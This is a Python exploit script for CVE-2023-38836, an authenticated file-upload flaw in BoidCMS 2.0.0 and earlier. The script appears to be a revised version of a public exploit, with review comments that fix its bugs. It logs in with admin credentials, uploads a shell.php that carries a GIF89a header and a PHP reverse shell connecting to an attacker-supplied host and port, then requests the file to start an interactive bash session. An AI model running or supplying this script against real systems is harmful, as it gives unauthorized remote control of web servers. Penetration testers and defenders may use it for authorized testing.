#!/usr/bin/python3
# Exploit Title: BoidCMS <= 2.0.0 - Authenticated file upload vulnerability
# Date: 08/21/2023
# Updated on: 07/05/2024
# Exploit Author: 1337kid
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://boidcms.github.io/BoidCMS.zip
# Version: <= 2.0.0
# Tested on: Ubuntu
# CVE : CVE-2023-38836
import requests
import re
import argparse
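# BoidCMS's admin forms carry a CSRF token that, as far as this script is
# concerned, is a 64-character lowercase hex string.  The regex is deliberately
# loose; the first match on the page is used (see _extract_token).
_TOKEN_RE = re.compile(r'[a-z0-9]{64}')

# Upper bound (seconds) on every HTTP round trip so a stalled or firewalled
# target cannot hang the run indefinitely - requests has no default timeout.
_TIMEOUT = 15


def _build_parser() -> argparse.ArgumentParser:
    """Return the CLI parser.

    Every flag is mandatory; argparse prints usage and exits with status 2 when
    one is missing, which replaces the manual None-check the original did.
    The port is parsed as an int so a non-numeric value is rejected up front
    instead of being interpolated unquoted into the PHP payload.
    """
    parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')
    parser.add_argument("-u", "--url", required=True, help="website url")
    parser.add_argument("-U", "--user", required=True, help="admin username")
    parser.add_argument("-P", "--passwd", required=True, help="admin password")
    parser.add_argument("-l", "--lhost", required=True, help="listening host")
    parser.add_argument("-p", "--lport", required=True, type=int, help="listening port")
    return parser


def _extract_token(html: str):
    """Return the first 64-hex-char token in *html*, or None when there is none.

    The original sent re.findall's whole list as the form value, which makes
    requests emit one ``token=`` field per match; a single string is what the
    form expects.  NOTE(review): any other 64-char hex blob that precedes the
    real token on the page would be picked up instead - confirm against the
    admin template if logins start failing.
    """
    match = _TOKEN_RE.search(html)
    return match.group(0) if match else None


def _php_payload(lhost: str, lport: int) -> list[str]:
    """Return the lines written to shell.php.

    The leading ``GIF89a;`` line is presumably there to satisfy an image
    signature check on upload (the server-side check itself is not visible
    here); the second line is a PHP reverse shell that connects back to
    ``lhost:lport`` and attaches an interactive bash to the socket.
    """
    return [
        'GIF89a;\n',
        f'<?php $sock = fsockopen("{lhost}", {lport}); proc_open("/bin/bash -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>',
    ]


def main() -> None:
    """Log in to the BoidCMS admin, upload shell.php via the media page, trigger it.

    This is an *authenticated* exploit: valid admin credentials are required.
    Side effects: writes ``shell.php`` into the current directory and leaves
    ``/media/shell.php`` on the target - both should be removed after the
    engagement.  Exits non-zero on any detected failure.
    """
    args = _build_parser().parse_args()
    print(r"========================================")
    print(r"======== CVE-2023-38836 Exploit ========")
    print(r"======== @1337kid ========")
    print("========================================\n")
    # Strip a trailing slash so "http://host/" does not become "http://host//admin".
    base_url = args.url.rstrip('/')

    with requests.Session() as session:
        print(f"[+] Logging in with {args.user}:{args.passwd}")
        page = session.get(f'{base_url}/admin', timeout=_TIMEOUT)
        token = _extract_token(page.text)
        if token is None:
            print("[-] No CSRF token found on the login page; is this BoidCMS?")
            raise SystemExit(1)
        login_form = {
            "username": args.user,
            "password": args.passwd,
            "login": "Login",
            "token": token,
        }
        resp = session.post(f'{base_url}/admin', data=login_form, timeout=_TIMEOUT)
        # Login failure is detected by substring only; a changed error message
        # (or a localised one) would make a failed login look successful and
        # the upload below would then fail with a misleading message.
        if "Incorrect" in resp.text:
            print("[-] Login Failed")
            raise SystemExit(1)
        print("[+] Logged in successfully")

        # ---- file upload to RCE
        print("[+] Uploading shell.php")
        page = session.get(f'{base_url}/admin?page=media', timeout=_TIMEOUT)
        token = _extract_token(page.text)
        if token is None:
            print("[-] No CSRF token found on the media page")
            raise SystemExit(1)
        upload_form = {"token": token, "upload": "Upload"}

        with open('shell.php', 'w') as fh:
            fh.writelines(_php_payload(args.lhost, args.lport))
        # Context manager so the upload handle is closed (the original leaked it).
        with open('shell.php', 'rb') as fh:
            session.post(
                f'{base_url}/admin?page=media',
                files={'file': fh},
                data=upload_form,
                timeout=_TIMEOUT,
            )

        # Requesting the file is what fires the reverse shell.  status_code is
        # an int: the original compared it with the string '404', so the
        # "Upload failed" branch could never run.
        resp = session.get(f'{base_url}/media/shell.php', timeout=_TIMEOUT)
        if resp.status_code == 404:
            print("[-] Upload failed")
            raise SystemExit(1)
        print(f'[+] Uploaded to {base_url}/media/shell.php')
        print(f'[+] Check the listener at {args.lhost}:{args.lport}')


if __name__ == "__main__":
    main()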